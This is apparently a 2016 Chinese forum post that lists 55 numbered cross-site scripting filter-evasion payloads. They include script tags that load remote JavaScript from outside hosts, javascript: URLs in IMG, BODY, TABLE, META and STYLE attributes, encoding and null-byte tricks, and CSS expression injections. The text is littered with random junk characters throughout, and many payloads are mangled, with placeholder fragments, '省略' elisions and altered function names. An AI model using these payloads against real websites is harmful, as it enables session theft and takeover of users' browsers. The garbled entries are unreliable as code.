(1)普通的XSS JavaScript注入
u7 C I; G' \, `# _<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
( z9 X2 `. w! l+ L* C(99)另类弹框
0 x" o4 t# m' h+ T! N<q/oncut=alert()>1 n: _9 {: I1 t1 u: s( H3 p/ j
<s/onclick=alert()>b
: y. F9 Q7 E! [! R! }6 H <XSS=" onclick="alert(1)//">clickme</SSX=">1 r, e1 h8 z3 a2 {3 _2 ]
<zzz onclick=alert`1`>clickme</zzz>
+ X( o: Z- Q9 _' `, Z1 [ <a onclick=alert`1`>clickme</a>
) @2 [9 Q7 I9 E0 T3 x8 _) w<a=">clickme</a=">! j. j6 [/ S3 B: T% z' i: _
<a=">clickme</a>4 R* h- M: k h3 C" o
<z=">clickme</z=">
9 C8 p9 s' i7 \7 n( A3 T<z onclick=alert`1`>clickme</z>
X& B4 x% @0 y% ^6 `$ i) `& D5 E1 y( b2 o5 Q: K) _2 Q
(2)IMG标签XSS使用JavaScript命令0 E0 F) I- F- C! f* T8 i
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
4 V, H0 Z6 ?, D- K
# N. w4 T$ Z6 d- ](3)IMG标签无分号无引号
" L3 D F p0 y+ D% c<IMG SRC=javascript:alert(‘XSS’)>( ~: W( H5 K. R' N0 Z
( ^7 ?5 K# w/ j) c1 e0 u, Z" L& J
(4)IMG标签大小写不敏感( J; N, L2 s; k- H5 B" v) l8 N# o
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
* V3 {: s" s7 _5 J& c: Q Q
1 o9 {9 E% c. Z' I1 ]4 W(5)HTML编码(必须有分号)
6 `' v; \) H E( @; _; F; K<IMG SRC=javascript:alert(“XSS”)>
( v" |0 s* S% p3 R" j8 i N/ [& Z6 L. l( O# L
(6)修正缺陷IMG标签9 ?+ O9 K7 t7 i7 C
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
* g- U7 d( I' l. Z; U1 b- F4 X
) w) W7 n3 d" ]! s0 C% \# e(7)formCharCode标签(计算器)1 `+ X* O7 l3 `% b D4 t
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>5 Z, r7 O6 ]: U3 N
" L: Z' v6 Y! E* h(8)UTF-8的Unicode编码(计算器); s$ P( G3 |; Z
<IMG SRC=jav..省略..S')>
( g' Q. `$ ^6 O" D
: K+ b! c) j3 r) D& b(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
' H Y! v9 z6 v( ]; d& R( m2 |<IMG SRC=jav..省略..S')>4 y. p; y1 {+ W5 O" O
' H! V( d0 R0 Z5 ~- y
(10)十六进制编码也是没有分号(计算器)
4 ~6 q9 t8 e6 Y; W/ W<IMG SRC=\'#\'" /span>
/ K4 i$ l% w/ X% ]/ I! J# _/ g% A' D" r! {0 \0 C, s
(11)嵌入式标签,将Javascript分开* [% M" p8 G9 ]( V/ Y; G- ^
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
$ y8 y) i/ n! U3 o, k. e- n, P3 X7 J, R5 j/ R, k
(12)嵌入式编码标签,将Javascript分开
L0 k2 s( r' S$ z2 p! v<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
- z5 @1 J; M# Q# K/ y1 z9 e% t$ R- d7 y9 y
(13)嵌入式换行符
9 X1 G: e/ K8 h* Y6 t' j7 i<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>: b/ N4 Y! o8 B# U5 _
. |: t: F$ y/ u3 Q(14)嵌入式回车
/ Z4 e& _# ~: {<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>" s: y+ T5 J! p ]% \
) F. [, c4 L/ a1 Z
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
3 l! j1 t3 }" _/ P5 ]<IMG SRC=\'#\'" /span>
* s7 I& K# M6 F. f E4 ]' o- b+ t
. n; ~& H! x! ] `- ]8 Y8 o. p(16)解决限制字符(要求同页面)
! K6 N& j$ M5 z( s3 _: ]<script>z=’document.’</script>
& @! w) R6 {! J# b<script>z=z+’write(“‘</script>; C3 Q% \7 n1 T! J7 G
<script>z=z+’<script’</script>+ j7 u/ b# N7 G7 r2 `( m6 W
<script>z=z+’ src=ht’</script>$ W- F- w9 H1 r; F0 J, {
<script>z=z+’tp://ww’</script>
. M# y+ d* x! a<script>z=z+’w.shell’</script>7 J' E( C! b% S3 ~3 p# B9 L
<script>z=z+’.net/1.’</script>) C# L0 N- ?9 v
<script>z=z+’js></sc’</script>- l5 M0 O' i Y9 V% g, z A5 q ~" u
<script>z=z+’ript>”)’</script>, B( C2 k: l# F
<script>eval_r(z)</script>5 d! p/ u* y: P4 ?1 j
q" o. M( o) H
(17)空字符
7 m+ f z" h( y1 e& kperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out4 |! v3 O2 y' H9 ]" @; q$ v. w
5 }+ E3 m. p: |% S! u' J% d(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
6 Z* Y; z1 k/ ~9 }! p+ J% X6 jperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out. ^% u1 E1 ~/ Z7 m
5 e& Q8 r$ o+ I
(19)Spaces和meta前的IMG标签
) r7 Z( j) H# R5 R0 d<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>* H q5 \- O0 r; }2 `) M
& E3 p8 ]$ u6 K8 Z(20)Non-alpha-non-digit XSS/ Z$ ^+ r- b( d1 w* l
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
1 V! z0 X" W. V% \( d
' _8 s! j1 p% _0 o; S0 ~8 y) @) c(21)Non-alpha-non-digit XSS to 2
; n2 ?8 b3 H) v<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
/ E( `8 {) e" g* g3 u* E6 l$ t! X0 A- P7 v" y2 R
(22)Non-alpha-non-digit XSS to 3
% w/ n9 u$ F- J: z<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>) a2 a9 u2 N0 B" {# X3 S# e
# o( w8 M/ x6 ^8 ^1 n( o" O(23)双开括号
' `: E# `# J$ @' a. f7 D<<SCRIPT>alert(“XSS”);//<</SCRIPT>" q8 k! o# }: c5 d6 m+ k
& v6 V% c' s1 \; Y7 x(24)无结束脚本标记(仅火狐等浏览器)& i& V$ L# \7 C% q. |6 y
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>, y7 X3 b( |" b( h5 Z
6 n- Q) H$ Z2 v* N# p(25)无结束脚本标记2; U- O& H+ ^3 P- o
<SCRIPT SRC=//3w.org/XSS/xss.js>
; Z4 W8 v: K; c( `: D6 d/ T6 L& H6 z" g5 l" w" p# t7 f8 @4 n+ \# `8 F1 x
(26)半开的HTML/JavaScript XSS
: O+ x- D" r) N7 J<IMG SRC=\'#\'" /span>
- V/ \% P! i* Z- Y9 K+ l0 R
& w" K* {/ y" N& t* A& _(27)双开角括号9 O) Z& ^" m" Z- o1 z- D9 U) n
<iframe src=http://3w.org/XSS.html <' K @, U% g- V, c! n4 l
* E q3 I( Y: L! [- l(28)无单引号 双引号 分号; v- `: ^ L4 I/ ^* ~
<SCRIPT>a=/XSS/
! ]& L T& E' d' d( b2 A. palert(a.source)</SCRIPT>
/ f- N. q- K; ^# X* t% Y/ B: U! ]3 A' d( V5 T
(29)换码过滤的JavaScript. k" I/ E1 M) v
\”;alert(‘XSS’);//
% I5 g2 E' v8 L j% U; ?6 p; R
+ Y! q3 a4 b9 @; L(30)结束Title标签
: m7 l7 u0 | b1 R8 m( Z$ Z' R</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
! Q5 ^6 j2 M& j2 F0 [9 A0 _9 b: K0 C: H' L1 h6 o# \
(31)Input Image5 l6 e' `7 h; v8 ^; M
<INPUT SRC=\'#\'" /span>
7 A6 Q( E: V# K7 o3 a% F6 d: q% g
& v, m$ l8 I* I$ B2 Z" u(32)BODY Image
& H: l. Y8 Z/ c# ^) q<BODY BACKGROUND=”javascript:alert(‘XSS’)”>: m' [: M: F5 j* z4 L
1 l) i. f7 w( k1 l(33)BODY标签6 K. k( n. G: @7 L9 m" h
<BODY(‘XSS’)>
/ G g- T: |7 x- D% X- V( w: X0 |' W. _
(34)IMG Dynsrc
+ L9 D4 k6 d, c0 {6 @6 a<IMG DYNSRC=\'#\'" /span>* T$ @1 V; C$ R$ ?4 b/ Q; p! E
1 n) N5 H |# s9 K; a& X(35)IMG Lowsrc
# z. t& J. e; |; [, |<IMG LOWSRC=\'#\'" /span>7 V4 B! q( M I6 `6 U! `* F
6 s( j) n2 p" N. p% R, N6 A- B! n. w(36)BGSOUND% e9 X: ?3 n2 i' f( }) A" o* d# m
<BGSOUND SRC=\'#\'" /span>9 _6 `* O& |& V# r b0 d% [
+ S7 D3 p# g3 _(37)STYLE sheet
5 l/ B* b" o$ R1 p3 \<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>9 T X" z: }8 c: d: S V
7 z. K, Z' g/ z L/ ?
(38)远程样式表" U$ z- c! F5 q5 l2 W4 N
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
9 r/ C+ h" v+ {6 Z: `9 y3 B7 a; |$ W; R
(39)List-style-image(列表式)& f' S! z& f7 J! ^
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS8 G5 d) @6 E1 u% L9 ]1 q, F
" q1 t) g7 a" W4 T' A
(40)IMG VBscript2 ^6 O& C2 @& e! d9 u
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS7 s! Y$ J# |( e Z& ~
1 [. z- j4 i% o: C+ z% g(41)META链接url
& u+ D: ?+ Y# P<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>4 q; K6 r, O! G- w( n3 M
9 ` |: [. k7 w
(42)Iframe
$ J9 }4 c, ]& r8 H<IFRAME SRC=\'#\'" /IFRAME>3 c) c7 u9 O: t/ o+ M
! i; R& Q' }6 [* A5 s3 |
(43)Frame8 ]) k6 [2 p8 k8 H7 W1 B
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
0 E! x/ C) B( g2 H4 S5 |2 J
' g8 s2 E. [8 _; i9 D* e; _9 L(44)Table9 H" c' h' Y+ K* x9 k
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
+ x2 ?2 ~ w' x8 X/ ]0 ^% [
- n9 h. ?3 Z1 |$ N) ?# J [(45)TD$ f p# g9 w7 i- k
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
" T; D- H7 d% g0 \8 _+ ~
- q8 b: x: ^, V' \/ u(46)DIV background-image) c# u1 b% E2 _* ~# P' g" [
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>9 _2 h2 o5 z. w- R
; v9 n8 I+ \# r1 d" j% i(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)2 |! M! {+ i; E- Q' h% U
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”># q7 R* e1 X: y5 W4 E
$ y2 Q' J5 r- [8 J$ O# K
(48)DIV expression
8 o# o9 l. M$ e0 U1 U0 m<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
1 H8 m6 ]- B, b' O8 N* G& j4 M! A$ Z1 u7 U4 m5 ^9 m
(49)STYLE属性分拆表达
; ^% Z: _- ~3 |7 {3 D9 p4 y4 D<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>4 o, I, ?6 F7 N4 B6 b# J2 V
$ y Z- a7 Z/ R1 ]
(50)匿名STYLE(组成:开角号和一个字母开头)) e$ j( M3 ~; C, |' S2 X7 A3 U
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
! Z7 k% g: X- i4 g. u. ]) v/ D+ o/ x7 m7 F5 n+ I; E0 F
(51)STYLE background-image# b+ j0 i7 A8 g) G9 E
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
) V6 t% ~; i( v! K, b
, v' V2 [! O+ S* [# h- o(52)IMG STYLE方式" f* p+ e0 t4 E2 }
exppression(alert(“XSS”))’>% V. w2 t0 ]3 X. l
& `, l# I& n- W: M8 I
(53)STYLE background- {! Q* N+ ~7 K
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>* n: l& C* A" @! \: V& v5 s
& C" _# N% a, {0 x! K, s4 S(54)BASE+ c$ e$ K8 x" Y; C
<BASE HREF=”javascript:alert(‘XSS’);//”>
1 H) y% b3 F7 a% L5 U9 N) Z; h1 E$ n' i2 l, ]7 ?' ?. A8 ]$ M" r) O
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS# B; @5 I; f9 N) v& Y% N
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>5 x3 s! Q& K! j6 `% A( |" x
|
发表于 2016-4-28 10:06:15
收藏
支持
反对